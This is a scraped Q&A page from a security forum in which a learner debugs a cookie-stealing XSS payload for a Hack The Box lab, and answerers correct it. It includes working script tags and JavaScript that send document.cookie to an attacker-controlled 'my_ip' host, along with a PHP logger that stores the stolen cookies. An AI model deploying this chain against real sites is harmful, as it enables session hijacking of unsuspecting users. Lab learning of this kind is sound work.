XSS code not fetching back script

The name of the pictureThe name of the pictureThe name of the pictureClash Royale CLAN TAG#URR8PPP












0















I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.



The issue I have is that after the initial call from the top fetch the index.html the malicious script which should be called from the html file is not getting called.



Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.



The application is using HTTPS but my python server is HTTP.



Is my implementation wrong or my understanding of this attack vector?



<script src="http://My_ip/index.html"></script>


I'm trying to then fetch this html file containing a remote malicious script...



<html>
<body>
<script type="text/javascript">
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
</body>
</html>


And this is my php script that is supposed to be receiving the file.



<?php
header ('Location:https://intra.redcross.htb/');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "nn");
?>


The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.



I did also try this as the XSS payload but I only got the callback and no cookie data.



<script src='http://my_ip/write.php?c='+document.cookie;</script>









share|improve this question
























  • Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?

    – tim
    Dec 30 '18 at 22:05











  • @tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before

    – Rich C
    Dec 30 '18 at 22:37















0















I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.



The issue I have is that after the initial call from the top fetch the index.html the malicious script which should be called from the html file is not getting called.



Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.



The application is using HTTPS but my python server is HTTP.



Is my implementation wrong or my understanding of this attack vector?



<script src="http://My_ip/index.html"></script>


I'm trying to then fetch this html file containing a remote malicious script...



<html>
<body>
<script type="text/javascript">
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
</body>
</html>


And this is my php script that is supposed to be receiving the file.



<?php
header ('Location:https://intra.redcross.htb/');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "nn");
?>


The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.



I did also try this as the XSS payload but I only got the callback and no cookie data.



<script src='http://my_ip/write.php?c='+document.cookie;</script>









share|improve this question
























  • Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?

    – tim
    Dec 30 '18 at 22:05











  • @tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before

    – Rich C
    Dec 30 '18 at 22:37













0












0








0








I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.



The issue I have is that after the initial call from the top fetch the index.html the malicious script which should be called from the html file is not getting called.



Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.



The application is using HTTPS but my python server is HTTP.



Is my implementation wrong or my understanding of this attack vector?



<script src="http://My_ip/index.html"></script>


I'm trying to then fetch this html file containing a remote malicious script...



<html>
<body>
<script type="text/javascript">
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
</body>
</html>


And this is my php script that is supposed to be receiving the file.



<?php
header ('Location:https://intra.redcross.htb/');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "nn");
?>


The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.



I did also try this as the XSS payload but I only got the callback and no cookie data.



<script src='http://my_ip/write.php?c='+document.cookie;</script>









share|improve this question
















I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.



The issue I have is that after the initial call from the top fetch the index.html the malicious script which should be called from the html file is not getting called.



Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.



The application is using HTTPS but my python server is HTTP.



Is my implementation wrong or my understanding of this attack vector?



<script src="http://My_ip/index.html"></script>


I'm trying to then fetch this html file containing a remote malicious script...



<html>
<body>
<script type="text/javascript">
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
</body>
</html>


And this is my php script that is supposed to be receiving the file.



<?php
header ('Location:https://intra.redcross.htb/');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "nn");
?>


The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.



I did also try this as the XSS payload but I only got the callback and no cookie data.



<script src='http://my_ip/write.php?c='+document.cookie;</script>






xss javascript






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited Dec 30 '18 at 22:42







Rich C

















asked Dec 30 '18 at 21:13









Rich CRich C

1115




1115












  • Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?

    – tim
    Dec 30 '18 at 22:05











  • @tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before

    – Rich C
    Dec 30 '18 at 22:37

















  • Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?

    – tim
    Dec 30 '18 at 22:05











  • @tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before

    – Rich C
    Dec 30 '18 at 22:37
















Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?

– tim
Dec 30 '18 at 22:05





Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?

– tim
Dec 30 '18 at 22:05













@tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before

– Rich C
Dec 30 '18 at 22:37





@tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before

– Rich C
Dec 30 '18 at 22:37










1 Answer
1






active

oldest

votes


















5














As far as I can tell, there are two issues here:



  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).

So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>





share|improve this answer


















  • 1





    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)

    – EdOverflow
    Dec 30 '18 at 23:29







  • 1





    "[...] the JS file would then contain JS code [...]", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:") in that JavaScript file you are fetching. So index.js would contain document.location='http://my_ip/write.php?c='+document.cookie;. This will then fetch the JavaScript file from https://my_ip/ and run the code from the file in the victim's session.

    – EdOverflow
    Dec 31 '18 at 12:11










Your Answer








StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "162"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);

else
createEditor();

);

function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
noCode: true, onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);



);













draft saved

draft discarded


















StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f200590%2fxss-code-not-fetching-back-script%23new-answer', 'question_page');

);

Post as a guest















Required, but never shown

























1 Answer
1






active

oldest

votes








1 Answer
1






active

oldest

votes









active

oldest

votes






active

oldest

votes









5














As far as I can tell, there are two issues here:



  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).

So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>





share|improve this answer


















  • 1





    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)

    – EdOverflow
    Dec 30 '18 at 23:29







  • 1





    "[...] the JS file would then contain JS code [...]", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:") in that JavaScript file you are fetching. So index.js would contain document.location='http://my_ip/write.php?c='+document.cookie;. This will then fetch the JavaScript file from https://my_ip/ and run the code from the file in the victim's session.

    – EdOverflow
    Dec 31 '18 at 12:11















5














As far as I can tell, there are two issues here:



  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).

So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>





share|improve this answer


















  • 1





    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)

    – EdOverflow
    Dec 30 '18 at 23:29







  • 1





    "[...] the JS file would then contain JS code [...]", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:") in that JavaScript file you are fetching. So index.js would contain document.location='http://my_ip/write.php?c='+document.cookie;. This will then fetch the JavaScript file from https://my_ip/ and run the code from the file in the victim's session.

    – EdOverflow
    Dec 31 '18 at 12:11













5












5








5







As far as I can tell, there are two issues here:



  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).

So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>





share|improve this answer













As far as I can tell, there are two issues here:



  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).

So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>






share|improve this answer












share|improve this answer



share|improve this answer










answered Dec 30 '18 at 22:58









timtim

23.1k66294




23.1k66294







  • 1





    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)

    – EdOverflow
    Dec 30 '18 at 23:29







  • 1





    "[...] the JS file would then contain JS code [...]", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:") in that JavaScript file you are fetching. So index.js would contain document.location='http://my_ip/write.php?c='+document.cookie;. This will then fetch the JavaScript file from https://my_ip/ and run the code from the file in the victim's session.

    – EdOverflow
    Dec 31 '18 at 12:11












  • 1





    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)

    – EdOverflow
    Dec 30 '18 at 23:29







  • 1





    "[...] the JS file would then contain JS code [...]", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:") in that JavaScript file you are fetching. So index.js would contain document.location='http://my_ip/write.php?c='+document.cookie;. This will then fetch the JavaScript file from https://my_ip/ and run the code from the file in the victim's session.

    – EdOverflow
    Dec 31 '18 at 12:11







1




1





If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)

– EdOverflow
Dec 30 '18 at 23:29






If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)

– EdOverflow
Dec 30 '18 at 23:29





1




1





"[...] the JS file would then contain JS code [...]", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:") in that JavaScript file you are fetching. So index.js would contain document.location='http://my_ip/write.php?c='+document.cookie;. This will then fetch the JavaScript file from https://my_ip/ and run the code from the file in the victim's session.

– EdOverflow
Dec 31 '18 at 12:11





"[...] the JS file would then contain JS code [...]", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:") in that JavaScript file you are fetching. So index.js would contain document.location='http://my_ip/write.php?c='+document.cookie;. This will then fetch the JavaScript file from https://my_ip/ and run the code from the file in the victim's session.

– EdOverflow
Dec 31 '18 at 12:11

















draft saved

draft discarded
















































Thanks for contributing an answer to Information Security Stack Exchange!


  • Please be sure to answer the question. Provide details and share your research!

But avoid


  • Asking for help, clarification, or responding to other answers.

  • Making statements based on opinion; back them up with references or personal experience.

To learn more, see our tips on writing great answers.




draft saved


draft discarded














StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f200590%2fxss-code-not-fetching-back-script%23new-answer', 'question_page');

);

Post as a guest















Required, but never shown





















































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown

































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown






Popular posts from this blog

How to check contact read email or not when send email to Individual?

Displaying single band from multi-band raster using QGIS

How many registers does an x86_64 CPU actually have?